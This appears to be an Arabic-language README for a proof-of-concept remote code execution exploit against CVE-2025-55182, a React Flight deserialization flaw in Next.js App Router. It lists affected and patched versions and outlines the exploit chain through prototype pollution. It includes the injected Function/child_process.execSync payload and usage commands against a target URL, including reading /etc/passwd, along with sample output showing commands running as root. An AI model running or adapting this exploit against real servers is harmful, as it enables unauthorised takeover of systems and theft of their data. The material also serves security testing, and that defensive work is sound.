
إثبات المفهوم لثغرة RCE لـ CVE‑2025‑55182 تستغل بروتوكول React Flight على Next.js App Router.
| Next.js | React |
|---|
| 14.3.0-canary.77 to 15.0.4 | 19.0.0 |
| 15.1.1-canary.0 to 15.1.8 | 19.1.0 |
| 15.2.0-canary.0 to 15.2.5 | 19.1.1 |
| 15.3.0-canary.0 to 15.3.5 | 19.2.0 |
| 15.4.0-canary.0 to 15.4.7 | |
| 15.5.1-canary.0 to 15.5.6 | |
| 16.0.0-canary.0 to 16.0.6 |
| Next.js |
|---|
| 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7+ |
$@ للحصول على مرجع Chunk خام.then بـ Chunk.prototype.then عبر $1:__proto__:thenstatus على resolved_model لتفعيل initializeModelChunk$B1337 لتفعيل إلغاء تسلسل Blob_formData.get إلى مُنشئ Function_prefix على كود JS المراد تنفيذهيتم تقييم الكود عبر:
Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")
pip install -r requirements.txt
python cve_2025_55182_poc.py https://target.com --check-only
# الأمر الافتراضي (id)
python cve_2025_55182_poc.py https://target.com
# أمر مخصص
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"
| الخيار | الوصف |
|---|---|
url | عنوان الهدف (مطلوب) |
-c, --command | الأمر المراد تنفيذه (الافتراضي: id) |
--check-only | التحقق من الثغرة فقط |
-t, --timeout | المهلة بالثواني (الافتراضي: 15) |
-v, --verbose | إخراج مفصل |
--raw | عرض الاستجابة الخام |
cd vulnerable-app
npm install
npm run dev
# الخادم على http://localhost:3000
+======================================================================+
| CVE-2025-55182 - تنفيذ التعليمات البرمجية عن بعد لمكونات خادم React |
| ثغرة إلغاء تسلسل بروتوكول Flight في React |
+======================================================================+
[*] المتأثر: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] درجة CVSS: 10.0 (حرج)
[*] المؤلف: rl0x01
[*] الهدف: http://localhost:3000
[*] المهلة: 15ث
[1/2] جارٍ التحقق من الثغرة...
[+] ضعيف! تم تأكيد RCE - تم استلام الإخراج
[2/2] تنفيذ الأمر: whoami
[+] تم إرسال الحمولة!
============================================================
النتيجة: whoami
============================================================
root
============================================================
CVE-2025-55182/
├── cve_2025_55182_poc.py # نص الاستغلال الرئيسي
├── requirements.txt # تبعيات بايثون
├── README.md # التوثيق
└── vulnerable-app/ # تطبيق Next.js ضعيف للاختبار
├── package.json
├── next.config.js
└── app/
├── layout.js
├── page.js
└── actions.js
⚠️ يتم توفير هذه الأداة لأغراض تعليمية واختبار أمني مصرح به فقط.
الاستخدام غير المصرح به لهذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني.